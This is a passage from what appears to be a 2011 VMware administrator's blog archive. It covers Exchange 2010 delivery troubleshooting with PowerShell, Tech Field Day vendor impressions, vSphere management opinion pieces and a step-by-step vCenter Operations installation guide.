I didn’t think much about it until my boss came to my desk and asked me to have a look at the problem. Our messaging guy was on vacation and I was the only other person on staff who had some messaging experience. It seemed that all of our global and even local offices were complaining about random Exchange disconnections, as well as email delivery delays ranging from 30 minutes to 4 hours! ActiveSync devices and OWA users were not affected by these delays at all. Being always up for learning new stuff, I took the challenge. First, let’s start with the quick facts I could put together. We had users in every country we have offices in complaining about the random disconnections and delays. I had one actually confirmed in China, but had some slight trouble getting exact user names from the local IT person. We also had connections randomly disconnecting and showing as disconnected in the lower right hand corner of the Outlook client, though I did not have any confirmation of who exactly was having these problems. To start, I dug through the event logs on all the servers in the Exchange 2010 environment, and the amount of errors I found was overwhelming. To shorten this up a bit and not write a novel: almost all of those I investigated were directly related to running Exchange 2010 SP1 without any update rollups in place, and there were corresponding KB articles from Microsoft confirming the fixes in various update rollups. One thing that stuck out, though, was an Event ID 2915 on our CAS servers: several EWS and RPC connections reporting “Session Limit Over Budget”. I correlated this with the Default Throttling Policy Exchange 2010 uses. It seems that the more mailboxes a user opens, the more connections Exchange creates, and it doesn’t clean these connections up on its own. To understand more about the Default Throttling Policy, see Understanding Client Throttling Policies.
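The kind of throttling change described next can be sketched with the Exchange Management Shell. This is not the author’s actual script, just a minimal example under stated assumptions (parameter names are from Exchange 2010’s Set-ThrottlingPolicy, and it must run against a live Exchange 2010 environment):

```powershell
# Locate the default throttling policy that ships with Exchange 2010
$default = Get-ThrottlingPolicy | Where-Object { $_.IsDefault -eq $true }

# Relax the budgets that surfaced as "Session Limit Over Budget" in
# Event ID 2915; $null removes the limit for that parameter
Set-ThrottlingPolicy -Identity $default.Identity `
    -RCAMaxConcurrency $null `
    -EWSMaxConcurrency $null `
    -EWSMaxSubscriptions $null
```

Removing limits entirely trades protection for availability, so treat a change like this as a diagnostic step rather than a permanent configuration.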
So I quickly whipped up a PowerShell script that set the Throttling Policy defaults to null so there were no restrictions (funnily enough, Microsoft states that doing just that is a valid workaround if you encounter an issue). If you are interested in seeing this script, or want me to go deeper into Throttling Policies, contact me, but this article isn’t quite about that so I will move quickly on. After the Throttling Policy was changed the reported disconnections stopped, but the delivery delays continued, as mentioned, all around the globe. With the other problem out of the way I began to realize that the remaining problem seemed very random. Some users experienced it, some did not, and some couldn’t tell me whether they experienced it or not. This is when the hours of fruitlessly digging through configurations to learn them, and reading about Exchange 2010 on Google, began. I noticed our mailbox servers were set up in an active-active configuration with bidirectional replication using DAGs. This is when I decided to go back to the basics of troubleshooting. I went over to my colleague sitting next to me and sent various test messages to him. All of them were promptly delivered without any problems. I noted down which server his mailbox was running on and moved on. Then I walked around the IT department until I found a colleague who confirmed they had the delivery delays of up to 4 hours. Just for kicks I turned off cached mode on their Outlook client, and their problem magically vanished. Then I turned cached mode back on and left it broken, since I was determined to fix it on the server side and not just band-aid the problem. When I went back to my desk and noticed which mailbox server the colleague with the delays was on, a light bulb went off and everything seemed to come together. Now all I had to do was note the differences between the 2 servers.
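Noting those differences can be done with stock PowerShell; a minimal sketch, assuming remoting access and with hypothetical server names:

```powershell
# Installed hotfix IDs on each mailbox server (names are placeholders)
$mbx1 = (Get-HotFix -ComputerName "MBX01").HotFixID
$mbx2 = (Get-HotFix -ComputerName "MBX02").HotFixID

# Show updates present on one server but missing on the other,
# which is exactly how a stray patch like KB2393802 stands out
Compare-Object -ReferenceObject $mbx1 -DifferenceObject $mbx2
```

Anything flagged with a side indicator exists on only one of the two boxes and is a candidate for closer inspection.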
First of all, to stop the global issue from occurring while I resolved the underlying problem, I failed all the DAG databases over to the one server that did not seem to be having the problem. Reports quickly came in that the problem was resolved. Then I quickly moved on to examining the differences between the 2 servers. After comparing Windows updates between the boxes I noticed that some updates from February had recently been applied to both servers; however, there was one difference. Microsoft KB2393802 was applied to one server but not the other. I googled it, but only found one vague mention of delays in Exchange 2010 mail delivery in the middle of a TechNet article relating to this patch, and nothing official at all from Microsoft. I removed the patch, rebooted, and tested with a test mailbox database I had created for this purpose, running on that server. The problem was fixed, as I suspected. I tried to research what it is about this patch that could be causing the problem, but came up with nothing. If any of you readers have an idea, please comment and let me know your thoughts! I have attempted to contact Microsoft regarding this issue so they could possibly append to the KB article, but they have not replied yet.

---

# vExpert 2011

URL: https://vNinja.net/news/vexpert-2011/
Date: 2011-07-01
Author: christian
Tags: fun

---

# Zerto: Or What I Learned at Tech Field Day #6!

URL: https://vNinja.net/virtualization/zerto-or-what-i-learned-at-tfd-6/
Date: 2011-06-27
Author:
Tags: Disaster Recovery, DR, Tech Field Day, Virtualization, VMware, vSphere, Zerto

On the last day of Tech Field Day #6, myself and all the other delegates were lucky enough to get a sneak peek at stealth startup ‘Zerto’. We weren’t allowed to talk about it until the 22nd, and I know I am a little slow off the mark, but I currently haven’t seen a lot of coverage.
Just as an initial disclosure statement: my trip to Tech Field Day 6 was paid for by the vendors we visited; however, I am in no way obligated to write about them or publicize them in any manner. Zerto is an Israeli and US based company founded by Ziv and Oded Kedem. They are doing very interesting things in the BC/DR space for the enterprise and cloud sector with regard to virtualization. They promise host-based, storage-agnostic replication and complete vCenter integration. Another nice feature is VM and VMDK consistency grouping, meaning it is built for vSphere environments and replicates at the VM/VMDK level. When I pressed a little to see how this is done, it turned out that it doesn’t use the vStorage APIs at all, but uses a vApp per host and a driver loaded directly into the hypervisor. That means it goes much deeper than Changed Block Tracking to determine incremental changes; it actually looks at the data coming through the vSCSI stack. It works similarly to a lot of current enterprise replication products in that it splits the IO as reads and writes come through; however, instead of putting it into array cache it puts it into memory, since it is working directly in the hypervisor. To credit @gabvirtualworld, he mentioned in his post, which goes a bit deeper, that it uses the VMware IOVP API to accomplish this. Zerto boasts application protection policies and built-in support for VSS to attain better application consistency on the other side. This would be useful, for example, with virtualized Exchange environments and running databases. The feature I really like is RDM replication to VMDK, or the other way around. This would be really useful if you were moving datacenters and wanted to change some things around in your storage configuration during the initial replication stage.
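To put that initial replication stage in perspective, a quick back-of-envelope calculation; the data size and link speed are assumptions, and compression and protocol overhead are ignored:

```powershell
# Rough transfer-time estimate for an initial synchronization
$dataTB   = 100    # assumed dataset size in TB
$linkGbps = 1      # assumed WAN link speed in Gbit/s

$seconds = ($dataTB * 1e12 * 8) / ($linkGbps * 1e9)
$days    = [math]::Round($seconds / 86400, 1)   # roughly 9.3 days
```

Numbers in that range are exactly why questions about built-in compression and WAN optimization matter for very large environments.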
What I also like a lot is the ability to create checkpoints/bookmarks on your replicated VMs from different points in time, just in case you had replicated a corrupted VM or a data inconsistency and needed to go back in time to resolve it (this is similar to the RecoverPoint technology). See the video below for a quick explanation of their product: Being kind of an old school FC network guy and a big user of array-specific replication products like SRDF and RecoverPoint (the founders of the company actually created the RecoverPoint technology and sold it to EMC), I am still very curious to see the speed and resiliency of the replication. For instance, would the built-in compression and WAN optimization be enough for a massive 100TB+ environment, and how would it handle the initial synchronization? Would a product such as Riverbed Steelhead, or any other WAN optimization product, be able to increase the replication efficiency? It will be very interesting to see, over time, what third party partnerships and certifications they develop to improve the usability and maturity of their product.

---

# 7 Expert Tips for Managing Your Remote vSphere Infrastructure

URL: https://vNinja.net/news/7-expert-tips-for-managing-your-remote-vsphere-infrastructure/
Date: 2011-06-20
Author: christian
Tags: published, Veeam, Virtualization, VMware, vSphere, Whitepaper

Now there is a catchy title if I ever saw one. The only “problem” is that it’s a whitepaper that I have written for Veeam. In reality, this is the first article I have ever written that I didn’t publish on my own. I’m excited about it, yet strangely nervous about how it will be received by the people who download it. If you happen to do so, make sure to let me know how you found it; all comments and criticism will be most appreciated.
Download this NEW whitepaper to get 7 Expert Tips for managing your remote vSphere infrastructure, including:

- Selecting the right products and solutions
- The best ways to protect data
- How to remotely manage and monitor the VMware infrastructure

Go ahead and download it now, and let me have it…: 7 Expert Tips for Managing Your Remote vSphere Infrastructure

---

# Multi-Hypervisor Management and the Future

URL: https://vNinja.net/news/multi-hypervisor-management-and-the-future/
Date: 2011-06-12
Author: christian
Tags: Hyper-V, hypervisor, management, Tech Field Day, vCenter, Xen

In a previous post, vCenter Integration Mantra, I made the point that vSphere vAdmins want the 3rd party modules to integrate into the vCenter client and show their delicious addon-value there, and not in their own management interfaces. Give the vAdmins the info they need, where they do most, if not all, of their work. Open up the admin client and let us get all that juicy and fruity information we need. Sounds good, right? Yes, it does. It sounds really good, but there is this one small curve-ball that can change everything. The 500-pound gorilla in the room that no one wants to talk about, but we all know is there. As a day-to-day VMware vSphere admin it’s really easy to put our blinders on and not see the forest for all the trees. During Embotics’ presentation at Tech Field Day #6 in Boston, it dawned on me: we might just be approaching this entirely the wrong way around. This epiphany was caused by one single statement from Embotics: “Our plan is to be hypervisor agnostic, and support other architectures in future versions”. Multi-hypervisor support? Provisioning VMs regardless of hypervisor, just creating what the business or application owner needs, on the performance and storage tier that suits that particular usage pattern best. Of course, this very much ties into the whole cloud mindset, and as a management concept it is really interesting.
Consider the following scenario: #

Your enterprise has a high-performance VMware vSphere environment where mission-critical applications run. All the bells and whistles are available in this environment: HA/DRS, a high-performance SAN, 10GigE networking and loads of CPU and RAM. For a given set of workloads available in the service catalog, the default would be to create new mission-critical workloads in this environment. Of course, chargeback mechanisms would also come into play, and price workloads in this environment at a premium level. For the sake of simplicity we’ll call this tier “Tier 1”. “Tier 2” would be your test/development and QA environment, where you probably won’t need the performance and high availability you get in “Tier 1”, and the chargeback mechanisms would reflect this in the cost model. This environment runs Hyper-V, has cheaper storage and simpler networking. “Tier 3” is your hosted environment, available outside of your own datacenters. Some workloads belong here too, and of course chargeback would come into play here as well. To further complicate things, the provider uses Xen for their environment. If 3rd party applications were to tie into the administration tools for those three separate hypervisors, administrators would have to use three different tools to manage their environment. What if we turned everything on its head and looked at it from the exact opposite direction? Why should 3rd party vendors have to tie into the hypervisors’ management tools? They wouldn’t have to if the hypervisor vendors made their admin tools available in a manner that let 3rd party vendors integrate the hypervisor management tooling into their own products instead. Solarwinds does something really interesting in their Virtualization Manager product: the statistics and status reports you get in your Solarwinds Virtualization Manager dashboard are all available as web “widgets” that you can include in other web pages.
In other words, you can integrate Solarwinds Virtualization Manager data into your existing dashboards. What if you could do the same with the output from future VMware vSphere, Hyper-V and Citrix XenServer management products? VKernel could do the same for their data, and you could easily create your own dashboard that contained information from a wealth of sources. Of course, there are a number of issues with doing something like this, like “what happens if you want to move something from Tier 2 to Tier 1, and the VMs run on different hypervisors?”, “how do you enforce security between hypervisors with different management systems?” and so on. This is not something that can be easily done today, and it might even be a pipe-dream, but it’s an intriguing thought. I do think we will see more and more multi-hypervisor environments in the years to come, and getting into the market for managing such environments seems like a good business opportunity (Note: IANAA = I Am Not An Analyst). Of course, this is an overly simplified scenario, but it does show that the need for management tools to be hypervisor agnostic is very much present, and will be even more so in the future. We as vAdmins need to apply pressure on our hypervisor vendors to try and make them open up their management tools in such a way that this could be possible someday; the multi-hypervisor world is already here, and it’s growing. Note: I wrote this post while on the plane returning from Tech Field Day #6 in Boston. Greg Ferro has replied to my original post with a post of his own, vCenter Integration Mantra – vEverything Is Not Wise, where he pretty much says the same as I do in this post. Tom Howarth also commented on the original post. In fact, I even voiced this opinion in the session we had with Embotics, when the Tech Field Day delegates had a roundtable discussion after the presentations. It all goes to show that you can in fact get blinded by the light.
---

# vCenter Integration Mantra

URL: https://vNinja.net/news/vcenter-integration-mantra/
Date: 2011-06-10
Author: christian
Tags: Ops, realworld, Tech Field Day, vCenter, VMware, vSphere

During Tech Field Day #6 in Boston one particular general feature request has become increasingly prominent: can we have it inside the vCenter client? In short, what we want is for all those great third party vendors like VKernel, Solarwinds and others to be able to put their feature addons directly into the vCenter client. Currently most third party apps “integrate” by offering a new tab where you can access them, but I would love to see that being expanded even further. As a concrete example, I would love to see, for instance, VKernel identify performance problems for a VM and then tell me, inside the summary tab for that VM, that there is a problem. Show it to me where I do my work, which is in vCenter, and mostly on the summary screen. Dashboards are great, but we’re all suffering from dashboarditis, and the more disparate dashboards and tabs we have to have relations with, the less we’re actually able to use them properly. Also, raise a vCenter alert to leverage my existing alerting scheme to get my attention. If a 3rd party plugin sees that something is wrong, tell me through the existing infrastructure I already have in place. No need to reinvent the wheel each and every time, from each and every vendor. Couple that with my back-end user authentication (e.g. Active Directory) for sign-on into your solution, and we’re getting much closer to the “single pane of glass” nirvana scenario we’re all craving. From what I gather, the vCenter client doesn’t allow this level of integration on the VM summary screen right now (I am in no way, shape or form a developer), but VMware needs to make it possible in the future. We admins want this, and we need it, and frankly, I think we deserve it (and so do the 3rd party vendors contributing to this ecosystem).
Update #

Read Multi-Hypervisor Management and the Future for an updated and more forward-thinking post on the same subject matter.

---

# Tech Field Day #6 - Arriving in Boston

URL: https://vNinja.net/news/tech-field-day-6-arriving-in-boston/
Date: 2011-06-08
Author: christian
Tags: conference, fun, Tech Field Day, vNinja, vSamurai

Yesterday I arrived at Logan International for Tech Field Day #6 in the greater Boston area. Christopher Wells had already arrived earlier in the day, and I was lucky enough to be picked up by Stephen Foskett at the airport and chauffeured to the Sheraton Framingham Hotel and Conference Center. The travel itself was pretty uneventful; the only trouble I had was that when I landed at Schiphol for the transfer to the US flight, my boarding pass was nowhere to be found, and I don’t think I even received it when I checked in at Bergen Airport Flesland. At the self-service transit counters at Schiphol I even got told, by the machines, that my reservation was non-existent. Of course, this was kind of troubling, but thanks to the very nice and service-minded KLM employees at Schiphol, the issue was quickly resolved and I was on my merry way. At least as merry as one can be when traveling transatlantic. The flight from Schiphol to Logan was incredibly boring though. Normally I have no problems sleeping while flying, but this time around I got a grand total of zero minutes of sleep on the entire trip. Add in the 6 hour time difference, and you’ve got one tired traveling vNinja on your hands. Stephen and I met up with Chris Wells at the hotel, and went out searching for dinner. Stephen, who seems to know everything there is to know, and then some, about Boston and the surrounding areas, guided us to a local Indian restaurant where we got some great Thali. After that we ended up at the Horseshoe Pub & Restaurant for some vTFDbeers! How many beers do they have on tap? Who knows; all I know is that it’s a lot!
I haven’t seen that many beer taps since I was at The Gingerbreadman in New York many moons ago. As you can clearly see, the world has indeed survived the first ever meetup between the vSamurai and the vNinja. Meeting up with both Chris and Stephen was a real treat, and I can’t wait for the rest of the delegates to arrive during the day. Tech Field Day 6: You look awesome.

---

# vSoup and Tech Field Day #6

URL: https://vNinja.net/news/vsoup-and-tech-field-day-6/
Date: 2011-06-01
Author: christian
Tags: conference, Tech Field Day, vSoup

vSoup Episode #10 is finally released, this time with Stuart Radnidge (blog) as our guest. This episode is a bit unusual, as we didn’t really have a set agenda before starting the recording, so we jump around all over the place, covering a pretty wide range of topics. Be sure to check it out! Tech Field Day #6 is approaching really fast; in fact it’s only a week away now! I will leave for Boston on Tuesday, June 7, for what looks to be a very, very busy but fun couple of days. I don’t know what to expect, but Chris Dearden has warned me that I probably won’t be idle much. This is the first Tech Field Day event that solely focuses on virtualization, and the presenter list looks really promising: [table id=1 /] In addition to these, there are a couple more presenters that have not been announced yet. I’ve met a few of the other delegates before, but the majority of them will be new acquaintances! Since the entire vSoup crew is going across the pond, we’ll try to get some live vSoup recordings done during the event! The delegates will also be attending the VMunderground BPaaS (Beantown Party as a Service): Tech Field Day 6 Edition, so if you are in Boston on Thursday 9th of June, be sure to get a ticket, stop by and say hi!
---

# Tech Field Day #6 - Delegate I Am

URL: https://vNinja.net/news/tech-field-day-6-delegate-i-am/
Date: 2011-05-16
Author: christian
Tags: fun, realworld, Tech Field Day, Virtualization

A while ago I got a surprising email, stating the following: You could consider this a sincere compliment from the Gestalt IT community as your name was suggested and we think you are the kind of person we all would love to have as part of our community. This means you're independent-minded, technology-focused, community-oriented, and a thought leader in the area of IT infrastructure. Of course, this is pretty much hogwash, but nevertheless I’m extremely honored to be invited as a delegate for Tech Field Day #6 in Boston, Mass. Thankfully I have a very understanding employer (and wife!) who pretty much immediately gave the go-ahead and let me take a few days off work to attend. Looking at the delegate list, it’s certain that I’ll be in extremely good company for the event, and there is a good chance we will be able to do some vSoup Live action while in Boston! Thank you Stephen Foskett and the rest of the Gestalt IT community who voted me in as a delegate; I’m sure you’re as surprised as I am. Look out Boston, the Delegates They Are A-Coming!

Links #

Gestalt Tech Field Day – Boston 6/10 June by Mike Laverick
vSoup Podcast & Tech Field Day 6 by Christopher Wells

---

# VMworld 2011 Session Voting

URL: https://vNinja.net/news/vmworld-2011-session-voting/
Date: 2011-05-09
Author: christian
Tags: conference, Session, vmworld, Vote

VMware has opened the public voting for the VMworld 2011 sessions. Personally I haven’t submitted anything, but I do see a lot of familiar names in the voting application. The voting is available to anyone who has a vmworld.com account, and the voting period runs from May 9th to May 18th. The voting is global, which means a vote for a session counts as a vote for both VMworld US and VMworld EMEA, as 80% of the selected sessions will occur at both events.
You can vote on as many sessions as you like, but only one vote per session. There is a plethora of sessions; in fact there are 854 sessions to choose between! Thankfully VMware has included a search application that enables you to focus on your particular areas of interest and find sessions that fit. I’ve done my part and voted, and I must say that some of these sessions sound great! Some of the session submitters have done a very good job of titling their submissions, which certainly helps in identifying what sessions to vote on. I won’t go through my entire list of votes, but a couple of sessions caught my eye immediately:

| Session ID | Title | Presenters |
|---|---|---|
| 2769 | You Know You Must Deduplicate Your vSphere Backups but Which Approach is Best for You? | Ian Blatchford, Product Manager, Hewlett Packard; Doug Hazelman, Senior Director, Product Strategy, Veeam Software |
| 3276 | From Epicenter to vCenter: Surviving natural disasters with VMware SRM | Christopher Wells, Systems Architect, TUV Rheinland Japan, Ltd |
| 1603 | How VMware's Products Are Like a Military Unit | Jase McCarty, Sr. vSpecialist, EMC Corporation |
| 1425 | Ask the Expert vBloggers | Duncan Epping, Principal Architect, VMware, Inc.; Rick Scherer, Senior vSpecialist, EMC Corporation; Frank Denneman, Consulting Architect, VMware, Inc.; Scott Lowe, CTO, vSpecialist Team, EMC Corporation; Chad Sakac, VP, VMware Technology Alliance, EMC Corporation |
| 1623 | Storage Superheavy Weight Smackdown 2011 | Cody Bunch, Blogger, ProfessionalVMware.com; Vaughn Stewart, Evangelist for Virtualization & Cloud Computing, NetApp; Chad Sakac, VP, VMware Technology Alliance, EMC Corporation; Mike Koponen, WW Solutions Marketing Manager, Hewlett Packard; Eric Schott, Executive Director, Dell Inc. |

Goes to show that titling your submission properly really does make a difference. Go forth and vote!
---

# vCenter Update Manager - A Feature Request

URL: https://vNinja.net/virtualization/vcenter-update-manager-a-feature-request/
Date: 2011-04-22
Author: christian
Tags: ESX, ESXi, Ops, vCenter, vCenter Update Manager, VMware

Way back on August 24, 2010 I wrote a post called vCenter Update Manager to lose it’s fat. I’m still very happy that VMware has decided to drop OS patching from the product, and I still think that can only be a good thing. In fact, that article prompted Beth Pariseau, Senior News Writer for searchservervirtualization.techtarget.com, to call me when researching her VMware users eye changes to Update Manager article. I would like to expand a bit on the following quote from the article: Centralized management is fine, Mohn said, but he’d like to see satellite servers hang on to a local repository of patches, which can then be applied with a command from the central server ... As I work with small ROBO environments, which in many cases have low bandwidth available coupled with very high latency, using VMware Update Manager to update the sites is often not feasible. The problem with installing the patches from a central HQ-based repository, namely the time it consumes and the potential failure rates, makes it more practical to download the patches manually to a local vMA installation (possibly even replicated with rsync) and apply the patches to the host from a local repository. This also minimizes the host’s downtime when applying patches. What I would like to see added to VMware Update Manager is the ability to tell a remote host to apply patches, but from a local file repository. Using vMA for this is absolutely possible, but I can also see using NAS storage local to the host as the patch repository as another possibility. With some DNS magic, it would even be possible to tell all remote vSphere hosts to fetch their updates from _\patchrepo\vmware_ (or something similar) and it would still be a local repository.
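A sketch of what the host-local variant can look like today with PowerCLI, assuming the patch bundle has already been replicated to storage the host can see; the vCenter name, host name, and repository path are all hypothetical:

```powershell
# Patch a remote host from a repository that is local to the host
# (e.g. site-local NAS), instead of streaming the bundle from HQ.
# Names and paths below are placeholders for your own environment.
Connect-VIServer vcenter.hq.example.com

Install-VMHostPatch -VMHost (Get-VMHost "esx01.remote.example.com") `
    -HostPath "/vmfs/volumes/localnas/patchrepo/metadata.zip"
```

The point is that only the patching command crosses the WAN; the patch payload never does.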
VMware Update Manager could even handle the replication of the patches to the remote sites, but in general I’m in favor of using the existing underlying network infrastructure that’s already in place to move the patches from the central location to the remote locations. So, in short, all I’m asking for is a way to tell a central VMware Update Manager installation where the patches for a remote server are located, and to invoke the patching process from the central installation. Surely, that can’t be too much to ask for, can it?

---

# Installing and running VMware Compliance Checker for vSphere

URL: https://vNinja.net/news/installing-and-running-vmware-compliance-checker-for-vsphere/
Date: 2011-04-20
Author: christian
Tags: Ops, Security, Software, VMware, Windows

The first version of the new VMware Compliance Checker for vSphere tool is now available for download. VMware Compliance Checker for vSphere lets you scan your ESX and ESXi hosts for compliance with the VMware vSphere hardening guidelines, to make sure your hosts are properly configured. It also lets you save and print your assessment results, so you can track your compliance level over time, or use them as documentation for internal audits.

Installing VMware Compliance Checker for vSphere #

After downloading the VMwareComplianceCheckerForvSphere.msi, installing is done in a matter of seconds, using the all too familiar click-Next-to-continue Windows installation routine. The tool is Windows only at this point. The tool is Java based, so the client machine you run it on needs to have Java installed locally before you can use it.

Running a Compliance Scan #

Running a compliance scan is very easy. Start up VMware Compliance Checker for vSphere and point it towards either an ESX/ESXi host, or towards your vCenter installation. The tool runs for a while, and in the end you’ll be presented with a nice HTML based report highlighting all your compliance shortcomings!
Impressions/Conclusion #

VMware Compliance Checker for vSphere looks like it can be a valuable tool to add to your vAdmin tool-belt. In its first version it does a good job of identifying potential issues with your environment. As far as I can see, William Lam’s Perl based vSphere Security Hardening Report Script does more extensive checks for now. The vSphere Security Hardening Report Script also has a couple of other advantages: one being that it’s operating system agnostic (since it’s Perl based); another being that, since it’s written in a scripting language, you can set up automated cron jobs that perform the scanning for you. As far as I can see the VMware tool is missing the ability to schedule scans, which is something I really hope VMware will add in the not too distant future.

---

# vNinja enables HA

URL: https://vNinja.net/news/vninja-enables-h/
Date: 2011-04-13
Author: christian
Tags: Ed, fun, HA, News, vNinja

I’m happy to announce that my fellow vSoup Podcast co-host Ed Czerwin is on board as a blogger here on vNinja.net! This means that from now on you won’t just have to put up with the content of one virtualization admin, but two! As all good vAdmins know, two is better than one, and it’s so much easier to build HA solutions around! Welcome aboard Ed, glad to have you on!

---

# VMware Forum 2011 Oslo

URL: https://vNinja.net/news/vmware-forum-2011-oslo/
Date: 2011-04-08
Author: christian
Tags:

Yesterday I attended VMware Forum 2011 in Oslo (Norwegian). The venue and location at DogA - the Norwegian Centre for Design and Architecture was very nice, but sadly I must ask VMware: who is the intended audience for the VMware Forum event?
According to the invitation, people that will benefit from attending VMware Forum 2011 include:

- CIO, CFO and General Managers
- Infrastructure and Datacenter Managers
- IT Managers and Directors
- Security Managers
- Systems Administrators
- Desktop, SOE Managers
- Application Managers, Application Administrators
- Application Developers
- IT Procurement Managers

Sadly, I fail to see how VMware Forum 2011 in Oslo would be very beneficial for existing VMware customers, at least not on a technical level. To me it seems like VMware Forum 2011 was geared more towards potential new customers that haven’t seen the benefits of virtualization yet, rather than being an event for existing customers who are already running VMware products in their production environments. This is a bit strange, since it’s very likely that all of the attendees are existing customers already! There were three “tracks” you could follow during the event; one of them was mainly led by VMware employees, while the other two were sponsor driven and, as far as I could gather, mostly marketing and not geared towards the more technical attendees of the event. Even the VMware-led presentations were mostly marketing biased, and did not dive deep into any sort of real world scenarios where I, as an existing vAdmin, could get any real value. Even with presenters like Vittorio Viarengo, VP of Desktop Products at VMware, VMware failed to bring anything significantly new to the table, and the presentations pretty much all started with VMware explaining their vision of “The Cloud” and their customers’ “Journey to the Cloud” (private, public or hybrid).
I don’t mind VMware evangelizing their cloud vision, and I fully expect them to, but as an attendee I don’t see why every presentation needs to start with the same slide deck explaining their three steps to the Holy Grail of Cloudification:

IT Production ⇒ Business Production ⇒ IT as a Service #

In the keynote, that’s fine, but why do I need to see that slide, and its explanation, in every other session too? I understand that VMware is delivering a message, but frankly, doing it this way is somewhat insulting to someone who grasps the concept and got up at 05:00 to catch a plane to attend the event. Perhaps I’m being overly critical, but VMware Forum 2011 did not meet my expectations by a long shot. Of course, meeting up with Lars Trøen (blog) and Vegard Sagbakken has value on its own, but that wasn’t the primary reason I had for attending VMware Forum 2011. Next year, please include a “technical” track that us existing vAdmins can follow and get some real value out of. Give us some real world use cases, presented by the clients themselves, highlighting some non-marketing/fluff based scenarios. Admins want the real deal, not cloudspeak. I did get one real thing out of the event, however, and that is what Fusion-io and HP are doing with integration in their blades. You can read more about that over on Lars’ new site Core four. Fusion-io, HP Blades and VMware View sounds like VDI nirvana, even if Atea did bring a paperboard Donkey and Horse on stage with them while presenting.

---

# Digital Ship Magazine April 2011

URL: https://vNinja.net/news/digital-ship-magazine-april-2011/
Date: 2011-04-01
Author: christian
Tags: digital ship, Ops, Presentation

Back in February 2011 I was invited, along with my IT Manager, to do a presentation at Digital Ship Scandinavia 2011. Digital Ship magazine has now published an article based on what we presented at the live event.
As far as I can gather, based on the feedback both at the event and afterwards, the presentation was a success, and the Digital Ship Magazine for April 2011 now includes a two-page article based on the entire presentation. I was not aware that they would do this; had I known, I would clearly have corrected the misconceptions in the “For installation we use the VMware Hypervisor on Windows Server 2008 R2 and put a Virtual Machine on top of that” “quote”, since that is wrong on several levels. Other than that, the article highlights all the important take-away points from our presentation, so if you’re interested in managing and installing IT infrastructures on remote and floating locations, have a read! Download the Digital Ship Magazine April 2011, and have a look at pages 10-13 for the article called “From ’lightly chaotic’ to strictly standardised - onboard networks”. --- # vSoup Episode #7 and VMware Podcast Directory URL: https://vNinja.net/news/vsoup-episode-7-and-vmware-podcast-directory/ Date: 2011-03-28 Author: christian Tags: Podcast, VMware, vSoup vSoup Episode #7 “Everything is better with Bacon” is now available for your listening “pleasure”. With Sean Clark as our guest, we get into quite a few topics like storage and SQL virtualization. Be sure to check it out! In related news, VMware has created a Virtualization Podcast directory over on the VMware Communities portal. Way to go John, hopefully the other podcasts will follow suit so we can have one common directory for all of us! --- # vNinja.net available also on vNinja.com URL: https://vNinja.net/news/vninja-net-available-also-on-vninja-com/ Date: 2011-03-21 Author: christian Tags: site, vNinja Thanks to the generosity of Todd Wright, vNinja.net is now also available via vNinja.com. Todd came out of nowhere and offered to redirect his vNinja.com domain to vNinja.net, since he didn’t have time to do anything with it himself.
I’m very grateful that Todd wanted to do this, and thanks to some quick Apache trickery .com now redirects to .net, to make sure Google doesn’t find and penalize any duplicate content. Thanks again Todd, it’s much appreciated! --- # Installing and configuring VMware vCenter Operations URL: https://vNinja.net/virtualization/installing-and-configuring-vmware-vcenter-operations/ Date: 2011-03-21 Author: christian Tags: Maintenance, Monitoring, Ops, realworld, vCenter, vCenter Operations, Virtualization, vSphere VMware vCenter Operations was released to the general public a week or so ago and is available for download right now. As usual you can download a 60-day trial, and get started immediately. Like other recent management utilities from VMware, vCenter Operations comes in the form of an .OVF template (like vCMA/vMA). Installing VMware vCenter Operations # Download VMware vCenter Operations and import it by starting the vCenter Client, navigating to the “File” menu and selecting “Deploy OVF template…” Browse to the download location, and find the “VMware-vcops-1.0.0.0-373027_OVF10.ova” file. Select it and click Open. Click on “Next” and review the details. Hit “Next” once more, and click on “Accept” to accept the VMware EULA and enable the “Next” button. Specify the name and location of the VMware vCenter Operations VM, and click “Next” to continue. Now we get to select which host or cluster the VM should be deployed to. Make your choices, and click on “Next”. Select your preferred resource pool, if you have any, and once again click “Next”. Now select your preferred datastore, and guess what? We get to click “Next” one more time! Decide if you want a thin or thick provisioned VM; the default is thick, but I went with thin provisioned in this particular setup. The last configuration item, for now, is to map the networks. Select your network mappings and click on “Next”.
Review the final setup screen, and once you are satisfied that your settings are correct, click on “Finish” to start the OVF template import. The import starts, and after a few minutes it should be ready to go! Success! Time to start it up! Configuring VMware vCenter Operations # After the vCenter Operations VM has finished booting, it displays a little information screen showing the IP address and other tidbits of information. The most important piece of information right now is the DHCP assigned IP address. Make a note of that IP for later. To make sure we don’t run into problems with time synchronization, we need to make sure that the vCenter Operations VM time is synchronized with the ESX host time. To do so, right click on the VMware vCenter Operations VM inside of the vCenter Client and select “Edit Settings”. Select the “Options” tab, and find the VMware Tools section. Find the “Synchronize guest time with host” option, and select it. Open the vCenter Operations web page in a browser, and log in. The default username/password for vCenter Operations is admin/admin. Log in, and follow the directions on screen to change the default username/password. The new password must be at least 8 characters long, and contain at least one digit and one letter. Note: This also changes the root account password for the vCenter Operations VM. Next up is configuring the vCenter Operations connection to the vCenter. Fill out the vCenter Server information form with information pertinent to your infrastructure. Note that the registration credentials need to have administrator privileges on the vCenter Server. You can use the same credentials for both registration and collection, or you can differentiate them if required in your environment. Click on “Save”, and a test is performed to make sure that the information provided is correct. If registration is successful, a new popup appears explaining that you need to use the vSphere Client to assign the vCenter Operations licenses.
Click on “Ok” and the vCenter Operations setup dashboard appears in your browser. Go back to your vCenter Client and navigate to the “Home” screen. You should now see the new “vCenter Operations” icon under “Solutions and Applications”. If it does not appear immediately, close the vCenter Client and restart it to have it pick up the installation. To install the vCenter Operations license, go to “Home” and find the “Licensing” icon. Click on it, and change the “View by:” option to “Asset”. Right click on “vCenter Operations” and select “Change License Key”. Select “Assign new license key to this solution”, click on “Enter Key…” and enter your license key and optionally a label for the key. Click on “OK” to return to the “Assign License” window, and click on “OK” again to install the license. Your license should now be installed and active. Go back to the vCenter Client “Home” screen and find the vCenter Operations icon under “Solutions and Applications”. Click on it, and vCenter Operations should already be actively monitoring your infrastructure. That’s it! You now have VMware vCenter Operations running in your environment. For details on how it works and reports on your operations, refer to the official VMware vCenter Operations documentation. Eric Sloof has also posted a couple of great videos in his VMware vCenter Operations - Troubleshooting Workflow post that give an in-depth overview of what VMware vCenter Operations is capable of doing. --- # vSphere iPad Client URL: https://vNinja.net/virtualization/vsphere-ipad-client/ Date: 2011-03-18 Author: christian Tags: fun, iPad, vCenter, Virtualization, VMware, vSphere, vSphere Client Like everyone else in the vUniverse, I’ve had a play with the very recently released free vSphere Client for iPad. 